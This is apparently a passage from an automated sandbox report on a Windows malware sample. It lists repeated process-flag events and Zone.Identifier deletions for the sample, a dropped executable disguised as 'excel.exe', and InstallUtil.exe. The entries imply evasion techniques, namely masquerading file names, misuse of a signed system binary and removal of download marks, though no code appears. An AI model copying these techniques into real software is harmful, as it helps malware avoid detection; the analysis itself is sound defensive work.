                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe:Zone.Identifier read attributes | delete
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\excel\excel.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
